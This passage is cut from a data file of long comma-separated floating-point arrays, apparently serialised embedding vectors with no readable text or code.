062,-0.0056797015,0.008741171,-0.0074565974,0.003361411,0.028754596,0.0062456634,0.026401626,-0.009970125,0.03876544,0.003880519,0.025580848,-0.006339654,0.049740747,0.0027892522,-0.031469095,0.017727148,0.002064736,-0.036584675,0.0039059028,0.010559933,-0.006108083,-0.0011640803,0.0061236606,-0.021642037,-0.013338535,-0.015254689,-0.0124908835,-0.0101917405,0.038006853,-0.02096428,-0.0042019305,-0.017727204,0.012030356,-0.0011845636,-0.013215556,-0.012321586,-0.028243814,0.0057338113,-0.025241055,0.018463362,0.01933473,0.0057479,-0.027639452,0.011077352,-0.02541044,0.011468596,-0.014078178,-0.005693846,0.008436728,0.0022460911,-0.012474041,0.0047609033,-0.02193668,-0.0032989301,-0.0390464,-0.023974882,-0.008622403,-0.0024900923,-0.0011398757,0.009310276,0.017785242,-0.010283219,0.03558718,-0.012603144,0.021499751,0.0035187372,0.018124087,0.022341883,-0.015947755,-0.023082,0.010938529,0.07671307,-0.007636755,-0.015883537,0.004876091,0.019714376,0.007657838,0.013999888,-0.026043994,-0.010519842,-0.017661422,-0.005711766,0.011232443,0.0028342288,0.01344899,-0.028430993,0.0016844244,0.009801675,0.023049664,-0.01399508,0.023990689,0.008285546,-0.023100594,-0.00059579144,0.030388547,0.0037756013,0.0077330573,0.018634174,-0.0002562954,0.008574842,-0.003522826,0.0067947516,-0.00876285,-0.006574917,0.010819746,0.01307238,-0.029844055,-0.0072033443,-0.0020338208,-0.0006824021,-0.019571962,-0.0020527246,0.01716647,0.0079642255,-0.030684227,-0.009440971,-0.007761698,-0.008772552,0.019581005,0.0029491212,-0.028672239,0.0040142694,0.006937376,0.023104869,-0.0069163097,0.018625863,0.0006714378,-0.008030661,-0.009588446,-0.0023657323,-0.014036081,0.033749554,0.00040911618,-0.008418705,-0.0024231381,-0.017804926,0.007001891,0.0008185221,-0.007992664,0.011150769,0.026059052,-0.0017653918,-0.0006245101,-0.010367653,0.006752948,0.007719854,0.008429459,-0.01470127,-0.010093826,-0.032556538,0.00074224663,0.024394458,0.027792325,-0.0038708446,-0.013005388,-0.011145499,-0.04118794,-0.020005325,0.031502645,-0.016111672,0.010159715,-0.0022578512,0.015427034,0.04029382,-0.004936189,0.001838233,0.0156148495,0.0057564992,0.0036586265,0.0005874143,0.00044315043,0.011783993,0.013797013,-0.009782523,-0.022551652,0.0042532287,-0.005468803,0.007813584,0.01114055,0.013564266,-0.006302069,-0.0032487945,-0.011498523,-0.0069198622,-0.03956715,-0.030398926,0.016632322,-0.007066225,-0.01604088,0.026240867,0.004282408,0.004400488,-0.00047503997,0.0058212574,-0.00452028,0.0094776,-0.018790495,-0.0058170063,0.009247181,-0.043435737,0.011634496,0.0026186854,0.012449924,0.027330086,-0.008741074,0.000017125732,0.0065284213,-0.0057886266,0.015974373,0.009271897,0.012880764,-0.017418873,-0.0024280269,0.002359012,0.019464431,-0.011735762,0.004300842,-0.016691064,-0.013086828,-0.02230597,0.026779247,-0.010269373,-0.009440701,-0.0007840992,-0.0007805306,0.0047968486,0.0021111672,-0.02289775,-0.0030497673,-0.028816106,-0.01502612,0.0073090745,0.016827095,0.010558289,-0.029146789,-0.02592246,0.0055982904,0.026675655,-0.007926271,0.03599368,0.003552619,-0.0022411884,-0.012615054,-0.0076570786,-0.01321154,0.018088527,-0.01178892,0.011435161,0.019556087,-0.010171072,-0.032266706,0.016933741,0.010090928,0.008195208,-0.006884412,0.0031664304,0.009802732,-0.020336233,0.031292196,-0.028740594,-0.011119615,-0.011744558,-0.011078085,-0.027845105,-0.00041001497,-0.04834326,-0.00026497597,0.0062834886,-0.01843917,0.013341187,0.022785539,0.008617154,0.027216762,-0.025253568,-0.013223615,0.0107895,0.0023949693,0.017061036,-0.017056944,-0.0021996691,-0.0076492913,-0.0075315177,0.006340422,-0.024649937,0.022867873,-0.0010987209,0.0024520722,-0.011179141,0.022008734,-0.003080084,-0.03416972,-0.013722175,0.0049080406,-0.008322472,0.0033841438,-0.006139803,-0.0051791603,-0.03371105,0.049505144,-0.025296586,-0.00719116,0.010321537,0.020247653,0.03180508,-0.013001091,-0.007641643,-0.018989181,-0.0030731955,-0.013253579,-0.045110606,-0.011328693,0.0053578373,-0.028172238,-0.025448225,-0.007940435,-0.009007133,-0.0035890443,-0.00039606786,0.012980985,-0.0032617075,0.013159903,0.01473243,-0.0049345335,-0.017570678,0.028672457,0.02319557,-0.0026309344,0.0104226805,0.0033139973,-0.007198235,-0.041526508,-0.03244995,-0.007468482,-0.0010023088,-0.016651755,0.0025083695,0.0013151718,0.010483873,0.040072236,0.012038945,0.0012389125,0.009608764,0.008314988,0.0011024845,0.033979353,0.014108509,-0.020653723,0.0053147725,0.0012091448,0.006161278,0.03420963,-0.007390805,-0.020507239,0.024860442,0.002529436,-0.02409778,-0.009303312,0.01200675,0.007422107,-0.014584522,-0.025117146,-0.009033953,0.0171859,0.011265869,-0.00018687332,-0.03340804,0.011682962,-0.0017080605,-0.020652581,0.010805902,0.0026054026,0.024725243,-0.0014312374,0.0057511735,0.010770758,0.005868173,-0.0046804394,0.031779286,0.02773625,-0.009087275,0.0038178442,-0.014638199,-0.00013495192,0.033660173,-0.012048111,0.00962084,-0.013927778,-0.01018511,0.037803676,-0.02120465,0.008811202,-0.0124644935,0.00196552,-0.009334487,-0.008835038,-0.03064948,0.0067581846,-0.018700622,-0.016017884,-0.02470919,-0.01228233,-0.0001761971,-0.014116632,0.010154555,-0.12669839,0.004532742,-0.032041628,-0.011532222,-0.0150872655,-0.0013319505,0.0031483937,-0.0034757906,0.016479896,-0.012381638,0.0020738547,0.027953686,0.0054728054,0.015994329,0.011272214,0.012986923,-0.0038602406,0.0029717037,-0.01651687,0.002090334,0.022277486,-0.016690427,-0.0036854488,-0.013489212,0.008467655,0.006464691,-0.0039640516,0.01092522,0.016839916,0.01779787,-0.009238676,0.018734857,0.018954294,0.007959269,0.014468376,0.014263228,-0.020488283,0.012997314,-0.0058128024,0.055833485,-0.00063639664,-0.0031342197,-0.018439718,-0.0050499006,0.0086222,0.0039648404,0.005371216,0.026915783,0.023488285,0.024549726,-0.015333291,0.019905966,-0.00032974192,-0.01545693,-0.015617882,-0.015692353,0.0001592987,-0.007274259,0.022051947,0.004300682,-0.011911851,-0.020967966,0.008861702,-0.017096568,0.009280259,0.0012890841,-0.014712065,-0.008349107,-0.02782463,-0.01037182,0.0021910584,0.0162554,-0.009902654,0.011887903,-0.013503554,0.012574274,0.022939079,-0.016684454,-0.011864811,0.034228645,-0.04335132,-0.007333412,0.014477542,0.027375786,-0.0050036605,-0.0027952173,0.010174557,0.0054918225,-0.006790142,0.005827081,0.011562643,0.020198714,-0.012933759,-0.01916744,-0.016922839,0.00041193474,-0.01964151,0.024048423,-0.0013346516,0.0064387736,0.00022539722,-0.015386219,0.008238337,-0.012015435,-0.080954,-0.01673,0.022559302,0.010487756,-0.01033081,-0.02295972,0.0061284835,0.0046062185,0.045536652,0.0007194571,0.0035884182,-0.0018258109,-0.009995569,0.0060164724,0.0119360145,0.006097091,-0.025285108,0.010711399,0.00764836,0.010060119,-0.00005600217,-0.011668241,0.0008218634,0.018775417,0.0039781574,0.015246639,0.017671706,0.042306453,0.010197771,0.0065730745,-0.003633502,-0.00569755,-0.012431538,-0.012961779,-0.049213443,-0.015826423,0.008518572,0.0037573653,0.018423844,0.007082287,0.0014746336,-0.01983818,0.010607487,0.009715901,-0.0042670574,-0.012205858,0.0067979647,0.026083551,-0.005813438,-0.02211739,-0.018193295,0.027026387,-0.0025684847,-0.007882955,-0.019786108,-0.013753066,0.0017416796,0.007905731,0.008315639,0.0006483556,-0.0019633651,0.006266238,-0.0015046609,0.015935222,0.018153848,0.02154111,-0.00906642,0.008091788,-0.012492042,0.013105859,0.00415892,0.03540659,0.009891433,-0.023970464,0.027534118,-0.00071003375,0.0059543797,0.034388512,0.00894895,-0.00027422217,0.009379565,-0.017465245,-0.005331017,0.01658637,-0.02717382,0.013364879,0.0013129136,0.011859965,-0.012460253,0.00632214,0.03042173,0.013706197,0.000733947,0.028314315,0.019205466,0.0057190526,0.02651001,-0.0074603655,-0.022928406,0.0014133455,-0.019448886,-0.016230756,-0.00052502606,0.02947824,-0.011472019,0.011762827,0.014794455,-0.0056912154,0.010063235,-0.010677064,0.009054373,0.016370766,-0.012887422,0.020188889,0.012774739,0.002393187,-0.0064049233,0.008395209,-0.011375894,-0.009302911,0.0031571337,0.0014048744,-0.00033602,-0.004345172,0.0012161321,-0.008962912,-0.012298983,0.02982397,0.016652608,-0.022562426,0.00032801082,-0.0045555574,0.0046135667,-0.010519893,0.005232142,0.017568277,-0.008285192,-0.0016229127,-0.0058665797,-0.016857289,0.018270766,0.0010908679,0.001145471,-0.011514087,-0.0058624693,0.0031534028,-0.006571061,0.004341792,-0.010405939,0.005039462,0.00008733557,-0.014668005,0.005082283,0.004265752,0.005823124,0.011335786,-0.0043744408,0.008805558,-0.0027620941,0.019533422,-0.009955607,0.030129706,0.035630535,0.0015757942,-0.011809135,0.0062483368,-0.019337926,-0.02769594,-0.020560788,-0.010099381,-0.009392749,-0.0008372941,-0.014381215,-0.046343796,0.007511282,0.0021070307,0.011815398,0.02364376,0.013738938,0.015572843,-0.028296944,0.015711019,-0.010004381,-0.01293073,0.014677605,0.012785196,-0.016002126,-0.019053552,-0.0056775827,-0.0075393836,0.040190414,-0.013895373,-0.0108365035,-0.013066985,0.00023817075,-0.00417477,-0.0031937417,-0.00070741394,0.016339233,-0.0024935561,-0.008272985,0.0032620193,0.0016717853,-0.00029496077,0.007165717,-0.0031236038,0.0080055995,0.04088491,0.006804108,0.0027843066,-0.017404418,0.033443872,-0.020489259,-0.011174982,0.014339823,0.009180539,0.011917034,-0.031918418,0.008094368,0.00968119,-0.034737553,-0.01683087,0.004749396,0.00095138577,-0.00037165624,0.028023388,0.026120726,0.018420232,-0.029784791,-0.0040503824,0.014934238,0.000028704788,-0.018611485,-0.008316706,0.011436955,-0.010767973,0.014381513,0.00021082841,0.011527242,0.0050991937,0.04404231,0.027325172,0.035834957,0.008825957,0.009912269,-0.009086298,-0.014319505,0.021119189,0.018189587,0.019441126,0.011296566,-0.005710553,0.001342061,-0.0030887863,-0.009558892,0.0045282408,0.008350778,-0.007372508,-0.013209166,-0.0051153926,-0.008620256,0.013273695,-0.028506836,-0.0075462335,-0.008073975,0.008950096,-0.005927471,-0.037195433,-0.006440078,-0.007429054,0.00573382,0.0014044305,0.006829983,0.00036281598,-0.040910795,-0.008098512,0.0025398254,-0.006255607,-0.0015466799,0.010021099,0.020578258,0.0055617904,-0.010955635,0.022132874,0.00203735,0.03152631,0.013257505,0.0014118141,-0.00097233016,-0.008374012,0.0022319423,-0.016205141,0.0032261983,0.0021234362,-0.0023422786,0.014803851,0.024644671,0.00077381387,0.005044917,0.004099998,0.026894072,-0.011153445,0.006608855,-0.011622772,0.017226323,0.01633745,-0.010692822,0.019446498,0.025352562,0.0101148505,-0.0134410495,0.00979993,-0.013065631,0.026829278,0.010248156,0.0069505307,-0.0022842411,-0.0012921559,-0.035474934,-0.023217898,0.0071831853,0.0092884,0.03575747,-0.039487075,0.010156354,0.002193141,-0.003320725,0.07207659,-0.028825797,-0.0057693487,0.013679439,-0.046135936,0.001804426,-0.002685421,0.010515076,-0.0072616558,0.018096779,0.02964814,-0.0032383879,0.023783294,0.005405687,0.0004925967,-0.016647166,-0.002484095,-0.012857932,0.020244498,0.018350175,-0.0025457654,0.0044670794,0.0041350573,0.007329215,0.009394691,-0.00047166337,-0.0056315023,-0.016487952,0.024033539,-0.05279767,-0.0051658493,0.0017777729,-0.0045291595,-0.012983415,0.033510182,-0.007975901,-0.03283879,0.008088423,-0.0045775585,-0.021782916,0.016499974,-0.009829496,0.007143646,-0.0050699334,0.01575305,-0.019899016,-0.019016486,-0.02449313,-0.07307081,-0.003383159,0.020457644,0.014762495,0.01855137,-0.014994061,-0.0042758263,0.003118382,0.017455345,0.019665653,-0.004876506,0.0014849681,-0.0030322054,0.012509233,0.021210976,-0.030784883,-0.007156113,0.010412279,-0.0018842716,-0.010191473,0.00613437,-0.003821305,-0.01179977,0.0076499106,0.016405156,0.01769646,0.0064980793,-0.015415558,0.024119046,0.00072831503,0.0071867104,0.0048386594,-0.0065401355,-0.0053250114,-0.0161476,0.009756733,-0.012606667,0.038539384,-0.025918333,0.0016758883,0.008710601,0.005431369,0.0041195746,0.021427438,-0.016193755,-0.00038566903,-0.025794253,-0.009904498,0.010747158,-0.0094941165,0.0033535894,0.02258458,-0.010879833,0.0060556764,0.028624736,-0.00016734435,0.01999267,0.0007658139,0.035911713,0.008798452,0.004285626,-0.01480882,-0.0028966255,0.010939535,0.00066946173,0.00963056,-0.0032484448,0.016280578,-0.0035028872,0.032647498,0.003467976,-0.029273693,-0.015539511,-0.019245012,-0.018819705,0.03134761,0.0003731172,-0.0053008343,-0.019879656,-0.017215632,0.041363027,0.0045436244,0.032130476,-0.004238175,-0.01242424,0.020217396,-0.02186319,-0.01695899,0.029693551,0.013065477,-0.0037571467,-0.0065194056,0.011393673,0.000023788847,0.016827773,0.005826219,-0.023332031,0.007241887,0.018973336,-0.005365145,-0.011371255,0.007116758,-0.0057016173,-0.009905789,-0.0176589,0.0125730755,-0.0061895475,-0.004357848,0.0022910936,-0.015378728,-0.0053966055,0.030976817,0.02609633,0.028302947,0.008244056,0.00009456988,-0.016117137,0.024280934,-0.010746174,-0.0142066935,-0.0064723934,-0.008494729,-0.020920826,0.010134685,0.014538042,-0.0067964992,0.0032635997,-0.0013725813,-0.00989833,0.023645477,-0.011638783,0.01095446,0.0042787963,0.019620515,-0.018241385,0.010981607,-0.027340082,0.010315781,-0.013830752,0.02037177,-0.010698044,0.00051066984,-0.0068481923,-0.0012324216,-0.025262453,0.02436726,-0.010542474,-0.0007961868,-0.0061116535,-0.023513662,0.0018407379,0.0018242844,0.00421892,-0.0064377342,0.018855743,0.0095180515,-0.009209361,-0.009054193,-0.014345162,0.004719795,0.003968948,0.009099654,0.020610731,-0.023086121,-0.013596701,0.008458478,-0.0011615328,-0.0048830616,-0.009287551,0.011283755,-0.021208268,-0.0077859266,0.017060457,-0.017992867,-0.023809731,-0.00932584,0.03972753,0.019694692,-0.015862616,-0.001484544,-0.02237879,0.018036183,-0.0022019714,0.006110919,-0.008048903,0.006281367,-0.00010053977,0.0041576778,0.011305717,0.00204591,-0.0064686257,-0.006257849,-0.013538625,-0.013447731,-0.017096289,-0.0019088843,0.0077008433,-0.00033189572,-0.006503583,0.019457921,-0.015805155,0.015617444,-0.017197989,0.009927324,0.03312522,0.002128718,-0.008890395,0.017552992,-0.018604055,0.0062672566,-0.0087796245,0.014702715,0.024116084,0.11122759,0.0067892233,0.0050421506,-0.011248115,0.0031349598,0.015707,0.025513949,-0.005552231,0.010052932,0.004579455,0.021704432,-0.012996299,0.015961496,-0.010523348,-0.007958068,0.026230838,0.020733776,-0.028547717,0.023044448,-0.007759225,0.008655737,-0.009104701,-0.018884376,-0.054415893,-0.009165339,-0.05891241,0.028719088,0.010580671,0.002607582,0.03178259,-0.0023570252,0.01057158,0.023298062,-0.015479645,-0.01646613,0.013215839,0.018373895,-0.0006683031,0.002322396,-0.024646642,0.0058317943,0.013816034,-0.0016248496,-0.021404134,0.0014870749,-0.017679283,0.012450097,-0.018907405,-0.008076263,-0.025314966,-0.013628934,0.008689995,0.021651024,0.0008665961,0.0080036875,-0.0057358807,0.0016016143,0.012156949,0.006595494,-0.016284142,-0.00014639698,0.0056599793,0.0029162634,-0.01774651,0.010991671,-0.0007576464,-0.026258426,-0.017255122,-0.0037992739,0.0032562194,0.01770612,0.007087812,-0.0042121834,0.0039085182,-0.013770099,0.025271615,-0.0059094625,-0.0006165174,0.021247083,-0.0067989253,0.006850565,-0.001964757,0.007801467,-0.0111022405,0.0013432053,0.019658685,-0.029555516,0.0015467689,-0.007421962,-0.012972912,-0.021115316,0.021883577,0.028053362,0.0013164064,-0.0133591555,0.011830207,0.01490814,0.011576862,-0.016017856,-0.013360805,-0.027257798,-0.02714518,0.00093415286,0.019280896,0.0024039955,-0.0024739383,-0.001893089,0.023952808,-0.016349511,0.008516326,-0.0026611309,0.02663208,-0.021565275,0.016646838,-0.005988545,0.036280684,-0.030047879,-0.006705201,0.01117619,-0.018730443,0.0021355378,-0.0048860977,0.0065131006,0.034854747,0.017428922,0.0037020226,-0.0147354435,-0.0070114126,-0.010336593,0.020385295,0.018970683,-0.045890186,0.00212866,0.014214897,0.0026883872,0.0011964065,0.034593254,0.00029690322,0.02223257,-0.007871402,0.017452018,0.0023091682,-0.0016934031,0.0011745348,0.0031000737,-0.009168903,0.015483191,-0.0073487633,0.013961807,0.011876469,0.0073151775,0.005204405,-0.0143265175,-0.003064593,-0.00393336,-0.0019144322,-0.02357266,0.016328325,-0.00020738457,0.0024593123,0.03527975,-0.008210341,0.022871416,-0.05462677,0.01694733,0.027551955,0.021956295,0.0030826828,0.020752188,0.0007378068,-0.012073108,0.0032663033,0.004413996,0.018700777,-0.026363064,0.006706905,-0.00029372604,0.015028869,-0.017692009,0.014219567,-0.00001624697,0.020148683,-0.0190503,0.0048790234,0.026593788,0.014023904,-0.010372784,0.030473279,-0.020135807,0.01245011,0.0024136023,-0.019223299,0.010084429,0.025052471,-0.02602171,0.0015937291,-0.03189471,0.032370627,-0.026420228,-0.0243775,-0.005591396,-0.0035587212,0.016302215,-0.024129188,-0.0070956517,-0.025250683,0.013329789,-0.0015572148,0.0040831873,-0.020086441,0.009937976,-0.001700017,-5.976829e-7,-0.02204973,-0.0028202503,0.0029487845,-0.012116215,-0.019352019,-0.030226324,-0.014424368,0.025566954,0.02223786,0.0021363518,0.008997946,0.008117983,-0.012181541,0.0018119302,-0.006349435,0.008098421,-0.030069731,-0.020661931,0.02066461,-0.0005555326,-0.018381113,-0.008019074,0.009684755,0.014047585,0.017437756,0.0009633298,-0.017715247,-0.021629067,-0.0052310685,0.020055717,0.010975201,-0.031376913,0.00012633063,-0.0048371614,-0.0050921203,0.00415082,-0.004566698,-0.013145564,-0.0010335312,-0.012889912,-0.021489225,-0.010993817,-0.031347252,0.0013264263,0.03460369,0.017641835,-0.01417355,0.014068883,0.024390033,-0.02048831,0.014244757,0.004448421,-0.009506659,-0.009653734,-0.003003527,-0.0055755116,0.0032715783,-0.0005902771,0.0042852294,-0.012848237,0.01305347,0.017543057,-0.0022421577,-0.01459928,-0.023625566,-0.0121126445,0.010435667,0.00340844,-0.01905729,-0.009620346,-0.014245174,-0.0005008842,0.005308991,0.010562224,0.020164654,0.063399896,-0.053947296,-0.0131093,0.008750836,-0.004942035,-0.04691392,0.013876028,-0.02007318,-0.016220296,-0.009308581,0.020971676,-0.0012718168,-0.008032201,-0.043510195,-0.016333912,0.005411373,-0.02224101,-0.003003965,0.022095073,0.0066461875,-0.017634232,0.0075320206,-0.008072856,-0.003497909,-0.00051768695,-0.0032183884,-0.0016508313,0.00008642688,-0.0027976062,0.0034650688,0.023259388,0.008151543,0.024401495,-0.03022247,0.01134187,-0.007899518,-0.0026296878,0.020220319,0.0032106636,-0.035321493,-0.035723317,-0.024366176,-0.009007239,0.0019952701,0.010035719,-0.012931694,-0.014583288,0.029107803,-0.006914929,0.11137652,-0.00728077,-0.01670483,0.014697952,-0.0032859317,0.005368335,0.018736897,0.012260777,0.013865082,0.019776933,-0.0042559286,-0.0018881265,0.0014072052,0.019517908,0.0014286967,-0.0105598485,-0.0062983595,0.13472003,-0.009080502,0.029080683,0.015506314,0.000015427855,0.0043289815,0.0030056636,0.027450526,-0.068698265,-0.008509988,-0.03170762,-0.0070288484,-0.012297757,-0.05024498,0.032202143,0.0054861475,0.020506311,0.011654576,0.029036688,0.0009061512,0.0013300257,-0.023769787,-0.018915037,-0.009515423,-0.011553505,-0.0071200426,-0.0053410595,-0.02523916,0.039234884,-0.043806005,-0.026960282,0.004121562,0.01631061,0.010279803,-0.0088940915,0.008006571,-0.0002283421,-0.0068340236,-0.012910633,0.010978139,-0.008224801,-0.029552711,0.009913953,-0.0041709454,0.019400952,-0.031991515,0.022427635,-0.012681356,-0.0037188488,-0.026456052,0.0055916244,0.0021523708,0.0012893091,0.013496733,0.017859004,-0.017285045,-0.00005313907,0.027698189,-0.0063665803,-0.0121604,0.019858707,-0.00088747626,0.004649026,0.013692953,0.0023151515,-0.012988916,0.0107278535,0.01585259,0.03395488,-0.003784734,0.009235763,0.025087358,-0.016724069,-0.0085677765,0.016888458,-0.0123337135,-0.0053253714,0.010587758,0.015840434,0.01111644,-0.0027201574,0.0020814545,-0.007633436,-0.012457142,0.02918967,-0.008701229,0.0138083855,0.0046068733,-0.007989589,-0.010888792,-0.02430708,0.0028182764,0.0038100209,-0.0074413978,-0.0025084065,-0.025714904,0.0016547445,-0.0073367013,-0.012114334,-0.021888701,-0.022649603,-0.03811454,0.00002052126,0.018087773,-0.00036073723,-0.0038231513,0.0020031673,-0.015792744,-0.0034520153,0.0065755253,0.020898743,-0.019362247,0.0023809967,-0.004315089,0.007988086,0.009457781,0.05276794,0.017811527,-0.021162903,0.012015224,-0.042911477,-0.013081508,-0.010390154,0.023218082,-0.0018991503,0.0032016374,-0.0032342153,0.0055648806,-0.015232524,-0.0026009197,-0.004243973],[0.014944949,0.0053309626,-0.011023105,-0.01108342,0.0135549465,-0.012530267,0.015966503,0.024020301,-0.00015492279,-0.012024857,-0.014250262,0.00040323188,0.0063233804,0.012799699,0.009688404,0.011586237,0.013312608,-0.009634555,-0.005398794,-0.015794916,-0.008570245,-0.000863087,0.026412252,-0.00021192108,0.014831682,0.007558075,-0.0031680015,0.0051223203,0.017089132,0.008951175,-0.0009115482,0.0346354,-0.004156971,0.0075535383,0.018795343,0.0146931205,-0.03035036,-0.022401918,0.017191984,-0.008552442,-0.016402915,0.02051116,-0.010032756,0.015610965,0.008013523,-0.0010625644,-0.021655299,-0.0007191567,-0.024622958,0.021941537,0.018399622,0.0076518944,-0.0614669,0.010960677,-0.0069078244,0.014036609,0.009621283,-0.0440805,0.023589544,-0.020643983,-0.009185681,0.009498986,0.021163851,-0.023774866,0.037623357,-0.0016290748,-0.0032517016,-0.038124546,-0.0060162153,-0.017037459,0.0058029,-0.0021358137,0.0059212307,-0.014005457,0.023139896,0.014515236,0.0011559693,-0.009878288,-0.018615238,0.014937009,-0.018732738,0.0052535017,-0.008827656,-0.007612421,0.0037386343,0.018650958,-0.004524324,0.011705199,-0.009192617,-0.018049853,0.0067785108,0.00960252,0.025694456,0.001386902,-0.009827624,0.002696867,-0.0037058196,-0.007639265,-0.0015047331,0.011789263,0.0008322994,-0.0013525255,-0.032572582,0.018679885,-0.0015120719,-0.021481898,-0.0044755954,-0.0144266095,0.004133031,-0.0022437326,0.012599685,0.010823768,0.005655676,0.017647205,-0.015551634,-0.012213648,-0.005246468,0.018004904,0.015707565,0.02342418,0.015540087,0.015148211,0.0075073764,0.0044194167,-0.025064606,-0.014925002,-0.010988249,0.025118373,0.0006288214,-0.0047530923,0.0007942332,-0.0033100713,-0.003627877,-0.005479985,0.0043383054,0.013920133,0.009279009,0.0024731287,0.012421749,0.012008468,0.03398805,0.002126143,0.016699236,0.014684379,0.023684055,0.014391542,-0.004295642,0.02328294,0.018132757,-0.014003333,0.023720764,-0.0037476982,0.016522825,-0.0008986851,0.016243279,0.010552897,0.010880854,-0.0012388886,-0.016094666,-0.007287298,0.010946571,-0.01851565,0.011301086,-0.0019162279,-0.015720474,-0.037431303,-0.014630718,-0.009187118,-0.028566873,0.010156622,0.010823403,0.033252172,0.011760206,-0.01367388,-0.009905391,0.015722338,-0.0004302989,-0.010977331,0.0067270803,0.0003572022,0.021675618,-0.0024599188,-0.016124435,-0.019230422,-0.0080331005,0.025927467,0.01029699,0.011616554,-0.0064359144,-0.031131115,0.007831591,-0.025748685,0.0032076116,0.006391199,-0.011105366,-0.014405118,-0.004729936,0.074974954,-0.017811906,0.0025827677,-0.02550756,-0.0071104355,0.019601358,-0.04533464,0.0046865284,0.0031902923,-0.001116313,-0.0040551797,0.00902261,0.011168451,0.029932482,-0.009284657,-0.014368967,0.0067689605,-0.0030159142,-0.06388169,0.027222384,0.011904359,-0.00033561766,-0.01708699,-0.017178385,0.004772502,0.0071612615,-0.01258226,-0.011787957,-0.018717406,-0.0058656703,0.01384787,-0.012760265,-0.023444526,0.011831711,-0.0089029195,-0.009863168,-0.019765075,0.032109793,-0.020916613,0.011223176,-0.017257892,-0.0038861374,0.016476316,-0.014679791,0.011934315,0.01787925,0.014371878,-0.0075026127,-0.006191701,0.0116205495,-0.0019312938,-0.0031466102,0.026989004,-0.013548726,0.010653365,0.006120849,0.030106556,-0.006969284,-0.03191422,0.008514607,-0.006104325,-0.017336287,-0.0038275125,0.038470473,0.025109725,-0.03355062,0.013156341,0.028137513,-0.016249638,-0.0008587664,-0.0385047,-0.02089203,-0.03697909,-0.013720437,0.01770475,0.0009837539,-0.011639788,0.00033605198,-0.022797484,0.010663853,0.008523804,0.009237277,0.0006773279,-0.00069793366,0.005728726,0.008535819,-0.018344877,0.0074896566,0.015996594,0.007338592,0.021268396,0.025813285,-0.008213631,0.01172147,-0.010394964,0.022527268,-0.004648503,-0.024262154,0.0056833974,-0.0036236232,0.021133998,0.026813135,-0.021961067,0.0032361844,-0.0122451205,0.0034304273,-0.013602922,-0.006079044,-0.00057668437,-0.016521953,0.033861496,-0.017442234,0.02025652,-0.052874934,-0.0049718795,-0.019643027,0.010506755,0.019425327,0.008077806,-0.021044625,-0.011263124,-0.029253446,0.0021343033,0.011110397,-0.029291708,0.03656253,-0.013254057,-0.013216683,0.001284317,0.006098475,-0.029891087,0.0043973657,0.0034360604,-0.0047707767,0.007662595,0.015246143,0.020725802,-0.034193672,0.009408974,-0.014424537,0.019517107,0.00086878653,-0.013442103,-0.021392472,-0.026539253,-0.005778681,0.004817341,-0.00945745,-0.017636819,0.002893576,0.0005781698,0.005154113,0.0049594003,0.025175117,-0.043563265,-0.021324463,-0.0017118447,-0.029948382,0.0065753628,-0.007487831,-0.0059692296,0.00023320237,-0.0072068227,0.017269589,-0.0022541357,-0.007915047,-0.0009282624,0.09144322,0.02994875,0.008401426,-0.0029968324,0.005479851,0.010618109,0.01987369,-0.0053054946,0.014118733,0.01116989,-0.019110005,-0.00078495697,0.00026249728,0.029830357,-0.010032241,0.015653666,-0.027140625,-0.020871097,-0.03665932,-0.0025045509,0.00042560932,-0.015216442,-0.0040111477,0.019540796,0.020641362,0.01131356,0.02528942,-0.010242779,-0.012888677,-0.0031690141,-0.0008514099,0.02882796,0.021643324,0.007478455,-0.023166332,0.012610179,0.014430452,0.007527155,-0.025844308,-0.008378992,0.01038662,0.012248883,-0.017875738,-0.016728014,0.007117937,0.04505211,-0.0026262035,-0.008381738,-0.020942053,0.023281699,0.0023038809,0.0032757751,-0.012209669,0.005344639,-0.014841899,0.015368061,0.012519929,-0.03677449,0.05528966,0.022339813,0.00789518,0.021661807,-0.0054124063,0.0010309067,-0.0006545774,-0.0025405092,-0.015607812,-0.012473042,0.0055604866,0.006039009,0.006318011,0.006213993,-0.009179051,0.015351837,0.015719574,0.01761704,-0.0011675418,-0.016222524,0.024433758,0.060695488,-0.00614834,0.012891635,0.002643854,0.012615398,0.012888938,0.0006635538,-0.008079486,-0.006262776,0.010578705,-0.012236501,-0.005847162,0.0059864856,0.0075995442,0.0038094062,0.00913625,0.004894059,0.03520592,0.023341551,0.0005626835,-0.0028115262,0.007336284,0.00822539,-0.013914738,-0.030501315,-0.0014456081,0.0068710004,0.015347567,-0.0022468404,0.004021359,0.04003063,-0.017725192,0.010748961,0.0022121018,-0.024763945,-0.0028617552,-0.004921728,0.0143904425,-0.011281542,-0.0026667176,0.0022431742,0.023905996,-0.009018027,0.0038391638,0.014664967,0.012551348,-0.008745269,-0.0044728518,-0.033585414,0.011752566,0.00845888,-0.006743734,0.007054996,-0.0014688631,-0.037945405,0.024361981,0.012305989,-0.024041148,-0.02082868,0.039743215,0.009012427,0.0071836496,0.027708061,0.012211553,0.0010160003,0.0057473555,0.03219576,0.04038645,-0.0056959875,-0.030392196,-0.008080217,-0.0074892435,0.0020039245,0.0028788263,-0.019549383,0.013841188,0.020564128,0.031684596,-0.005710203,0.00016213002,-0.017756071,0.018571824,-0.02308882,0.0036697853,0.011211356,-0.026129637,0.020679003,-0.0050464603,0.059001762,-0.0071950206,-0.045649067,-0.02337802,0.031331204,0.024060491,-0.009817054,-0.0043679504,-0.024990847,-0.0050491416,-0.011406374,0.029306382,-0.0043548374,0.021807136,-0.015980572,-0.009866205,0.00004198329,0.013554364,-0.015345545,-0.0065541016,-0.01669021,-0.005048327,-0.0249835,-0.017797468,-0.009560436,0.03231803,0.020284154,-0.014210441,-0.027897388,-0.028147724,-0.0006721727,0.014320833,0.010425398,-0.001172535,-0.00492213,-0.004517028,0.005183821,-0.0035465355,-0.008587294,0.024295155,-0.012897282,-0.023710785,0.0014499115,0.027121507,0.026711904,0.009119879,0.014815655,0.031471893,0.027430374,-0.0035406442,0.0014221364,0.019172361,0.023035334,-0.000016748809,-0.009510418,0.00024842247,-0.0031860266,0.0071176533,-0.016914718,-0.003334161,0.00096618535,-0.004436797,-0.034108546,-0.0013535435,-0.024974233,-0.016325729,-0.014419806,-0.005339503,-0.006526797,-0.029500904,-0.007404456,-0.009824982,0.010614273,-0.010335094,0.014358059,0.019489419,0.013619887,0.016918268,0.014655587,-0.004383578,0.0028930132,0.020229511,-0.011829433,0.004943405,-0.0036138294,0.004992388,0.0021243794,-0.0013640407,0.023430591,-0.006616776,-0.0023830638,-0.022837678,0.022747874,-0.007363311,0.015101596,-0.0021905925,0.017735587,-0.02903478,-0.0014458646,0.000065081316,-0.030670874,-0.001172543,-0.005055191,0.021926967,0.000831